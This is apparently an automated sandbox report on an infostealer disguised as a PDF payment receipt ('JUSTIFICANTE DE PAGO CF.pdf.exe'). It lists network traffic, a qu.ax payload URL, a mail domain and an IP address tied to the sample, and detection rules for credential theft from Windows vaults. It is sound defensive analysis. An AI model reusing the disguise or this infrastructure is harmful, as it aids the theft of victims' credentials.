3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366097Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:14 GMTExpires: Wed, 28 Feb 2024 20:09:14 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:22 GMTExpires: Wed, 28 Feb 2024 20:09:22 GMTServer: EOS (vny/0451)Content-Length: 433Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366106Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:23 GMTExpires: Wed, 28 Feb 2024 20:09:23 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:30 GMTExpires: Wed, 28 Feb 2024 20:09:30 GMTServer: EOS (vny/0451)Content-Length: 433Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366114Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:31 GMTExpires: Wed, 28 Feb 2024 20:09:31 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256
                            Source: Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACer&
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000635A000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.0000000001646000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 
0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3210242387.0000000001105000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2151160347.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2343413127.0000000006807000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2230741842.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2325501173.0000000000615000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.000000000627E000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2406307664.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.0000000001646000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 
0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 
0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000030F6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.wassadadvogados.com.br
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000635A000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.0000000001646000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 
0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.000000000251B000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000263B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000030F6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wassadadvogados.com.br
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, repeat.exe.2.dr, Reramvw.exe.0.drString found in binary or memory: https://qu.ax/HCHP.pdf
                            Source: Reramvw.exe, 00000009.00000002.2328135287.000000000253F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax4e
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000265F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.axH
                            Source: repeat.exe, 00000007.00000002.2233090518.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.axen
                            Source: Reramvw.exe, 00000003.00000002.2152875189.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.axin
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 
0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002955000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.0000000002555000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.0000000002675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iana.org/domains/example
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49711
                            Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknown, Network traffic detected: HTTP traffic on port 49706 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49711 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49728 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49723 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49706
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49728
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49723
                            Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49706 version: TLS 1.2
                            Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49711 version: TLS 1.2
                            Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49723 version: TLS 1.2
                            Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49728 version: TLS 1.2
                            Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49733 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, A1HZ.cs, .Net Code: ymtWxyX

                            System Summary

                            Source: 6.2.Reramvw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.31afa1c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                            Source: initial sample, Static PE information: Filename: JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1994031203.0000000006410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEjhrxhh.exe" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1994246590.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNnemtwpsj.dll" vs JUSTIFICANTE DE PAGO CF.pdf.exe
